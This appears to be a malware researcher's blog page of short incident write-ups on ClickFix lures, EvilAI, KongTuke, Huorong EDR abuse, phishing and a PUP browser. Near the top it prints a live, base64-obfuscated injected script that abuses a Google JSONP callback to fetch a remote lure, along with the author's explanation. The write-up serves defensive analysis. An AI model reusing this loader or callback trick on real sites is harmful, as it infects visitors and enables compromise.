Intel Reconfig Manager Exploited via DLL Sideloading

ClickFix Attack Chain

This incident began with ClickFix (Like they all do these days).

The domain mnnursinghomelaw[.]com was compromised and serving a standard ClickFix lure.

The injected code used Reflected XSS to load the ClickFix page.

<script id="A9TNB8" src="https://accounts.google.com/o/oauth2/revoke?callback=Function(atob(%27CiAgICBsZXQgYkFib3J0ID0gZmFsc2U7CiAgICBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdtb3VzZW1vdmUnLCAoZSkgPT4gewogICAgICAgIGlmKGJBYm9ydCkgcmV0dXJuOwogICAgICAgIChmdW5jdGlvbiAoZCwgdywgbywgdSwgbiwgcykgeyAgIC8vY29uc29sZS5sb2coJ2dzdicsIGdzdik7IGNvbnNvbGUubG9nKCd2ZXJtJywgdmVybSk7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coJ2dzdiA9ICcsIGdzdik7CiAgICAgICAgICAgIGlmICghc2Vzc2lvblN0b3JhZ2VbImdzX2xvIl0gfHwgc2Vzc2lvblN0b3JhZ2VbIl9fc3luY19sb2FkIl0gPT09ICJvbmNlIikgcmV0dXJuOwogICAgICAgICAgICBjb25zdCBzdHlsZSA9IGQuY3JlYXRlRWxlbWVudCgic3R5bGUiKTsKICAgICAgICAgICAgc3R5bGUudGV4dENvbnRlbnQgPSAiQGtleWZyYW1lcyBmYWRlSW57ZnJvbXtvcGFjaXR5OjB9dG97b3BhY2l0eToxfX1ib2R5e29wYWNpdHk6MDthbmltYXRpb246MXMgZWFzZS1pbi1vdXQgMXMgZm9yd2FyZHMgZmFkZUlufSI7CiAgICAgICAgICAgIGQuaGVhZC5hcHBlbmRDaGlsZChzdHlsZSk7CiAgICAgICAgICAgIHZhciBkYXRhID0geyBob3N0OiBkLmxvY2F0aW9uLmhvc3QsIG5vdzogRGF0ZS5ub3coKSB9OwogICAgICAgICAgICBzID0gZC5jcmVhdGVFbGVtZW50KG8pOwogICAgICAgICAgICBzLmFzeW5jID0gMTsgcy5zcmMgPSB1ICsgIj9kYXRhPSIgKyBlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkoZGF0YSkpOwogICAgICAgICAgICBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQocyk7CiAgICAgICAgfSkoZG9jdW1lbnQsIHdpbmRvdywgInNjcmlwdCIsIGF0b2IoImFIUjBjSE02THk5c2FYTjBMbTFsZEdGdFpYUnlhV056TG01bGRDOCIpICsgYXRvYigiWjJWdmRHUjJNbWx1YzNSaGJuUXVjR2h3IikpOwogICAgICAgIGxldCBlbFMgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQTlUTkI4Iik7CiAgICAgICAgZWxTICYmIChlbFMucmVtb3ZlKCkpOwogICAgfSwgeyBvbmNlOiB0cnVlIH0pOwo%27))"></script>

The response from accounts.google.com/o/oauth2/revoke lists the function as the first item, which causes the <script> tag to parse and execute it.

// API callback
Function(atob('CiA...Owo'))({
    "error": {
        "code": 400,
        "message": "Invalid JSONP callback name: 'Function(atob('CiA...Owo'))'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
        "status": "INVALID_ARGUMENT"
    }
});

This script decodes to an event listener that looks for a mousemove event. When detected, it decodes a URL and pulls the ClickFix lure.

ClickFix RockFest

Shout out to RedTeamRonin from DC612 for sending me this sample!

Incident Overview

Rock Fest is the largest rock and camping event in the United States. They use a WordPress domain that contains several potentially vulnerable plugins. This includes plugins vulnerable to multiple types of cross site scripting attacks. It is likely that the domain was compromised through a vulnerable plugin or exposed admin credentials.

The ClickFix page utilizes the Windows Terminal variant lure. Instead of asking users to use the Windows Run menu (Win+R), this lure variant asks users to open PowerShell or the Terminal with Win+X, select an Admin shell, and paste & submit the copied command.

Slides from a short talk on Evil AI I gave in February at DC612.

Direct Link

EvilAI Update

EvilAI is back at it again! Nothing significant has hanged with the payload or the Node abuse, but the campaign has developed a new Advanced Installer MSI lure that unpacks and executes a WebView2 .Net application loader. This loader creates a temporary directory and downloads the Inno Installer that contains the Node payload and configuration files. Like previous campaigns, the Node payload is executed via Scheduled Task.

Huorong Security Management Weaponized in ClickFix Attacks

Huorong is a Beijing based security company that offers an Endpoint Security Management Systems suite for enterprise and government customers. In newly observed ClickFix attacks, the Huorong EDR product is abused as an entry point into compromised systems. The Huorong Configuration Manager is bundled into an Advanced Installer MSI and installed on victim devices, giving malicious actors complete control over the device. The installer is deployed through compromised domains serving ClickFix (FakeCAPTCHA) lures.

KongTuke: ClickFix on Steroids

KongTuke is a threat actor that has recently increased their usage of ClickFix and ClickFix-styled attacks. They’ve begun to utilize a branching infection path based on the domain status of an infected device. If the device is domain joined, it will receive a different payload from non-domain joined devices. As Huntress notes, this is likely to identify and target Active Directory environments (also go read that write up, it’s way better than this!).

SSA AI Phishing

In another episode of ChatGPT-ass malware, we have this beautiful sample from a Social Security Administration phishing page taken from an incident on January 8th, 2026. If this is your phishing page, you should probably feel bad.

The phishing page itself is hosted on a XAMPP (Apache + MariaDB + PHP + Perl) stack on a Windows server using a free Cloudflare tunnel. Of course, they didn’t put any effort into configuring their server, so the default pages are easily accesible.

Slides from the Introduction to Malware Analysis workshop held on January 3rd, 2026. Samples are linked in the slides, but can also be acquired at Introduction to Malware Analysis Workshop Samples.

Direct Link

AceLauncher

AceLauncher is a Potentially Unwanted Program (PUP) similar to Wave Browser, OneStart, and OneLaunch. It’s a Chromium based browser that creates several tasks, AppData directories, and registry keys to maintain persistence on a device. While not overtly malicious, users will likely want to remove the browser as it does redirect and serve potentially malicious content. This includes functions that link to ManualsLib domains and references to Wave Browser and Recipe Lister. The browser also uses Yahoo’s Hosted Search platform to serve sponsored content driving revenue to the AceLauncher organization.

Phishing

I recently analyzed the following phishing email. It contains a Microsoft account harvester and has some interesting anti-analysis functions. I didn’t do a full dive on it, but there’s some interesting stuff here.

Examining the email in a text editor revealed that the headers had been manipulated.

The QR code image was extracted from the email via the Base64 encoded string object. This was put into CyberChef for rasterization and analysis.